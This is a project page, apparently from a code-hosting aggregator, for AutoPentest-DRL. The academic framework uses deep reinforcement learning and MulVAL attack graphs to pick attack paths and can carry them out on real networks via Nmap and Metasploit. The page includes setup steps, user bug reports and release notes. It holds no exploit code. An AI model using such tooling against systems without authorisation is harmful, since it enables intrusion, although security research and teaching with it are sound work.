AutoPentest-DRL: Automated Penetration Testing Using Deep Reinforcement Learning

Overview

AutoPentest-DRL: Automated Penetration Testing Using Deep Reinforcement Learning

AutoPentest-DRL is an automated penetration testing framework based on Deep Reinforcement Learning (DRL) techniques. AutoPentest-DRL can determine the most appropriate attack path for a given logical network, and can also be used to execute a penetration testing attack on a real network via tools such as Nmap and Metasploit. This framework is intended for educational purposes, so that users can study the penetration testing attack mechanisms. AutoPentest-DRL is being developed by the Cyber Range Organization and Design (CROND) NEC-endowed chair at the Japan Advanced Institute of Science and Technology (JAIST) in Ishikawa, Japan.

An overview of AutoPentest-DRL is shown below. The framework receives user input regarding the logical target network, including vulnerability information; alternatively, the framework can use Nmap for network scanning to find actual vulnerabilities in a real target network with known topology. The MulVAL attack-graph generator is then used to determine potential attack trees, which are fed in a simplified form into the DQN Decision Engine. The attack path that is produced as output can be used to study the attack mechanisms on a large number of logical networks. Alternatively, the framework can use the attack path with penetration testing tools, such as Metasploit, making it possible for the user to study how the attack can be carried out on a real target network.

Overview of AutoPentest-DRL

Next we provide brief information on how to setup and use AutoPentest-DRL. For details about its operation, please refer to the User Guide that we also make available.

Prerequisites

Several external tools are required in order to use AutoPentest-DRL; for the basic functionality (DQN training and attacks on logical networks), you'll need:

  • MulVAL: Attack-graph generator used by AutoPentest-DRL to produce possible attack paths for a given network. See the MulVAL page for installation instructions and dependencies. MulVAL should be installed in the directory repos/mulval in the AutoPentest-DRL folder. You also need to configure the /etc/profile file as discussed here. On some systems the tool epstopdf may also need to be installed, for instance by using the command below:
    sudo apt install texlive-font-utils
    

If you plan to use AutoPentest-DRL with real networks, you'll also need:

  • Nmap: Network scanner used by AutoPentest-DRL to determine vulnerabilities in a given real network. The command needed to install nmap on Ubuntu is given below:
    sudo apt install nmap
    
  • Metasploit: Penetration testing tools used by AutoPentest-DRL to actually conduct the attack proposed by the DQN engine on the real target network. To install Metasploit, you can use the installers made available on the Metasploit website. In addition, we use pymetasploit3 as RPC API to communicate with Metasploit, and this tool needs to be installed in the directory Penetration_tools/pymetasploit3 by following its author's instructions.

Setup

AutoPentest-DRL has been developed mainly on the Ubuntu 18.04 LTS operating system; other OSes may work, but have not been tested. In order to set up AutoPentest-DRL, use the releases page to download the latest version, and extract the source code archive into a directory of your choice (for instance, your home directory) on the host on which you intend to use it.

AutoPentest-DRL is implemented in Python, and it requires several packages to run. The file requirements.txt included with the distribution can be used to install the necessary packages via the following command that should be run from the AutoPentest-DRL/ directory:

$ sudo -H pip install -r requirements.txt

Quick Start

AutoPentest-DRL includes a trained DQN model, so you can use it out-of-the-box on a sample logical network topology by running the following command in a terminal from the AutoPentest-DRL/ directory:

$ python3 ./AutoPentest-DRL.py logical_attack

In this logical attack mode no actual attack is conducted, and AutoPentest-DRL will only determine the optimal attack path for the logical network topology that is described in the file MulVal_P/logical_attack_v1.P. By comparing the output path with the visualization of the attack graph that is generated by MulVAL in the file mulval_results/AttackGraph.pdf you can study in detail the attack steps.

For more information about the operation modes of AutoPentest-DRL, including the real attack mode and the training mode, see our User Guide.

References

For a research background regarding AutoPentest-DRL, please refer to the following references:

  • Z. Hu, R. Beuran, Y. Tan, "Automated Penetration Testing Using Deep Reinforcement Learning", IEEE European Symposium on Security and Privacy Workshops (EuroS&PW 2020), Workshop on Cyber Range Applications and Technologies (CACOE'20), Genova, Italy, September 7, 2020, pp. 2-10.
  • Z. Hu, "Automated Penetration Testing Using Deep Reinforcement Learning", Master's thesis, March 2021. https://hdl.handle.net/10119/17095

For a list of contributors to this project, see the file CONTRIBUTORS included in the distribution.

Comments
  • mulval topology template

    mulval topology template

    Hello, I just want to ask if I change the configuration of topology generator then I also have to change the topo_gen_template.P file content or is it a generic template. Thanks.

    opened by shoaib5261 7
  • Evaluating the model

    Evaluating the model

    Thank you for your support, but I have one more question. In the paper you wrote that this model has an accuracy of 0.86. I quite don't understand the method of evaluating, the data used for evaluating and whether that data is in this repo or not.

    Also, can you explain why the model has to train multiple times and the reward increases gradually? I think the simplified matrix holds all the possible paths so the model just need to loop through all paths and print out the desired one. Sorry for my weak understandings.

    Looking forward to your reply. Thank you!

    opened by QuynhNguyen269 5
  • FileNotFound error

    FileNotFound error

    Hi, I'm trying to run the code but it gives me multiple FileNotFound errors. Please help. Thank you!

    The output is:

    ################################################################################ AutoPentest-DRL: Automated Penetration Testing Using Deep Reinforcement Learning ################################################################################ AutoPentest-DRL: Operation mode: Attack on logical network AutoPentest-DRL: Target topology: MulVAL_P/logical_topology_1.P

    AutoPentest-DRL: Compute attack path for logical network... Generate attack graph using MulVAL... sh: 1: ../repos/mulval/utils/graph_gen.sh: not found Process attack graph into attack matrix... Traceback (most recent call last): File "/home/leekutti/NT522/AutoPentest-DRL/DQN/./confirm_path.py", line 9, in MAP = generateMapClass.sendMap File "./learn/generateMap.py", line 108, in sendMap self.x = self.createMatrix() File "./learn/generateMap.py", line 20, in createMatrix self.csvfile = open('../mulval_result/VERTICES.CSV', 'r') FileNotFoundError: [Errno 2] No such file or directory: '../mulval_result/VERTICES.CSV' Traceback (most recent call last): File "/home/leekutti/NT522/AutoPentest-DRL/DQN/learn/./dqn_learn.py", line 32, in env = gym.make('dqnenv-v0') File "/usr/local/lib/python3.9/dist-packages/gym/envs/registration.py", line 235, in make return registry.make(id, **kwargs) File "/usr/local/lib/python3.9/dist-packages/gym/envs/registration.py", line 129, in make env = spec.make(**kwargs) File "/usr/local/lib/python3.9/dist-packages/gym/envs/registration.py", line 89, in make cls = load(self.entry_point) File "/usr/local/lib/python3.9/dist-packages/gym/envs/registration.py", line 27, in load mod = importlib.import_module(mod_name) File "/usr/lib/python3.9/importlib/init.py", line 127, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 1030, in _gcd_import File "", line 1007, in _find_and_load File "", line 986, in _find_and_load_unlocked File "", line 680, in _load_unlocked File "", line 790, in exec_module File "", line 228, in _call_with_frames_removed File "/home/leekutti/NT522/AutoPentest-DRL/DQN/learn/env/environment.py", line 12, in class dqnEnvironment(gym.Env): File "/home/leekutti/NT522/AutoPentest-DRL/DQN/learn/env/environment.py", line 14, in dqnEnvironment MAP = np.loadtxt('../processdata/newmap.txt') File "/usr/lib/python3/dist-packages/numpy/lib/npyio.py", line 961, in loadtxt fh = np.lib._datasource.open(fname, 'rt', encoding=encoding) File "/usr/lib/python3/dist-packages/numpy/lib/_datasource.py", line 195, in open return ds.open(path, mode, encoding=encoding, newline=newline) File "/usr/lib/python3/dist-packages/numpy/lib/_datasource.py", line 535, in open raise IOError("%s not found." % path) OSError: ../processdata/newmap.txt not found.

    opened by QuynhNguyen269 3
  • AssertionError: The environment must specify an observation space

    AssertionError: The environment must specify an observation space

    hi everyone, Please help. Thank you!


    The output is:


    Process attack graph into attack matrix... Traceback (most recent call last): File "./dqn_learn.py", line 32, in env = gym.make('dqnenv-v0') File "/usr/local/lib/python3.7/dist-packages/gym/envs/registration.py", line 685, in make env = PassiveEnvChecker(env) File "/usr/local/lib/python3.7/dist-packages/gym/wrappers/env_checker.py", line 26, in init ), "The environment must specify an observation space. https://www.gymlibrary.ml/content/environment_creation/" AssertionError: The environment must specify an observation space. https://www.gymlibrary.ml/content/environment_creation/

    opened by VisaCai 2
  • about article

    about article

    in the article《Automated Penetration Testing Using Deep Reinforcement Learning》 ,we find a index about the Accuracy, i have a Confuse。the accuracy is between the best DQN penetration path and true path. or others?

    opened by lixiaohaao 1
  • target drone

    target drone

    Sorry to bother you frequently,Regarding the construction of a multi-level network, like the network in your experiment, can you elaborate on how to build it?

    Looking forward to your reply LIxiao

    opened by lixiaohaao 1
Releases(1.0)
  • 1.0(Jun 1, 2021)

    First release of AutoPentest-DRL, an automated penetration testing framework based on Deep Reinforcement Learning (DRL) techniques. The framework can determine the most appropriate attack path for a given logical network, and can also be used to execute a penetration testing attack on a real network via tools such as Nmap and Metasploit.

    Source code(tar.gz)
    Source code(zip)
Owner
Cyber Range Organization and Design Chair
Cyber Range Organization and Design (CROND) NEC-endowed chair at JAIST conducts R&D on cybersecurity education and training
Cyber Range Organization and Design Chair
Supporting code for the Neograd algorithm

Neograd This repo supports the paper Neograd: Gradient Descent with a Near-Ideal Learning Rate, which introduces the algorithm "Neograd". The paper an

Michael Zimmer 12 May 01, 2022
交互式标注软件,暂定名 iann

iann 交互式标注软件,暂定名iann。 安装 按照官网介绍安装paddle。 安装其他依赖 pip install -r requirements.txt 运行 git clone https://github.com/PaddleCV-SIG/iann/ cd iann python iann

294 Dec 30, 2022
Restricted Boltzmann Machines in Python.

How to Use First, initialize an RBM with the desired number of visible and hidden units. rbm = RBM(num_visible = 6, num_hidden = 2) Next, train the m

Edwin Chen 928 Dec 30, 2022
Official repository of OFA. Paper: Unifying Architectures, Tasks, and Modalities Through a Simple Sequence-to-Sequence Learning Framework

Paper | Blog OFA is a unified multimodal pretrained model that unifies modalities (i.e., cross-modality, vision, language) and tasks (e.g., image gene

OFA Sys 1.4k Jan 08, 2023
Large-scale language modeling tutorials with PyTorch

Large-scale language modeling tutorials with PyTorch 안녕하세요. 저는 TUNiB에서 머신러닝 엔지니어로 근무 중인 고현웅입니다. 이 자료는 대규모 언어모델 개발에 필요한 여러가지 기술들을 소개드리기 위해 마련하였으며 기본적으로

TUNiB 172 Dec 29, 2022
[ICCV'21] UNISURF: Unifying Neural Implicit Surfaces and Radiance Fields for Multi-View Reconstruction

UNISURF: Unifying Neural Implicit Surfaces and Radiance Fields for Multi-View Reconstruction Project Page | Paper | Supplementary | Video This reposit

331 Dec 28, 2022
Implementation of Memory-Compressed Attention, from the paper "Generating Wikipedia By Summarizing Long Sequences"

Memory Compressed Attention Implementation of the Self-Attention layer of the proposed Memory-Compressed Attention, in Pytorch. This repository offers

Phil Wang 47 Dec 23, 2022
A PyTorch implementation for V-Net: Fully Convolutional Neural Networks for Volumetric Medical Image Segmentation

A PyTorch implementation of V-Net Vnet is a PyTorch implementation of the paper V-Net: Fully Convolutional Neural Networks for Volumetric Medical Imag

Matthew Macy 606 Dec 21, 2022
Code for "Sparse Steerable Convolutions: An Efficient Learning of SE(3)-Equivariant Features for Estimation and Tracking of Object Poses in 3D Space"

Sparse Steerable Convolution (SS-Conv) Code for "Sparse Steerable Convolutions: An Efficient Learning of SE(3)-Equivariant Features for Estimation and

25 Dec 21, 2022
🦙 LaMa Image Inpainting, Resolution-robust Large Mask Inpainting with Fourier Convolutions, WACV 2022

🦙 LaMa Image Inpainting, Resolution-robust Large Mask Inpainting with Fourier Convolutions, WACV 2022

Advanced Image Manipulation Lab @ Samsung AI Center Moscow 4.7k Dec 31, 2022
Adversarial Robustness Comparison of Vision Transformer and MLP-Mixer to CNNs

Adversarial Robustness Comparison of Vision Transformer and MLP-Mixer to CNNs ArXiv Abstract Convolutional Neural Networks (CNNs) have become the de f

Philipp Benz 12 Oct 24, 2022
Streamlit Tutorial (ex: stock price dashboard, cartoon-stylegan, vqgan-clip, stylemixing, styleclip, sefa)

Streamlit Tutorials Install pip install streamlit Run cd [directory] streamlit run app.py --server.address 0.0.0.0 --server.port [your port] # http:/

Jihye Back 30 Jan 06, 2023
QRec: A Python Framework for quick implementation of recommender systems (TensorFlow Based)

Introduction QRec is a Python framework for recommender systems (Supported by Python 3.7.4 and Tensorflow 1.14+) in which a number of influential and

Yu 1.4k Dec 30, 2022
Robust Video Matting in PyTorch, TensorFlow, TensorFlow.js, ONNX, CoreML!

Robust Video Matting in PyTorch, TensorFlow, TensorFlow.js, ONNX, CoreML!

Peter Lin 6.5k Jan 04, 2023
Code for 'Blockwise Sequential Model Learning for Partially Observable Reinforcement Learning' (AAAI 2022)

Blockwise Sequential Model Learning Code for 'Blockwise Sequential Model Learning for Partially Observable Reinforcement Learning' (AAAI 2022) For ins

2 Jun 17, 2022
Sketch-Based 3D Exploration with Stacked Generative Adversarial Networks

pix2vox [Demonstration video] Sketch-Based 3D Exploration with Stacked Generative Adversarial Networks. Generated samples Single-category generation M

Takumi Moriya 232 Nov 14, 2022
A scanpy extension to analyse single-cell TCR and BCR data.

Scirpy: A Scanpy extension for analyzing single-cell immune-cell receptor sequencing data Scirpy is a scalable python-toolkit to analyse T cell recept

ICBI 145 Jan 03, 2023
A curated list of awesome Machine Learning frameworks, libraries and software.

Awesome Machine Learning A curated list of awesome machine learning frameworks, libraries and software (by language). Inspired by awesome-php. If you

Joseph Misiti 57.1k Jan 03, 2023
In this tutorial, you will perform inference across 10 well-known pre-trained object detectors and fine-tune on a custom dataset. Design and train your own object detector.

Object Detection Object detection is a computer vision task for locating instances of predefined objects in images or videos. In this tutorial, you wi

Ibrahim Sobh 62 Dec 25, 2022
Solution to the Weather4cast 2021 challenge

This code was used for the entry by the team "antfugue" for the Weather4cast 2021 Challenge. Below, you can find the instructions for generating predi

Jussi Leinonen 13 Jan 03, 2023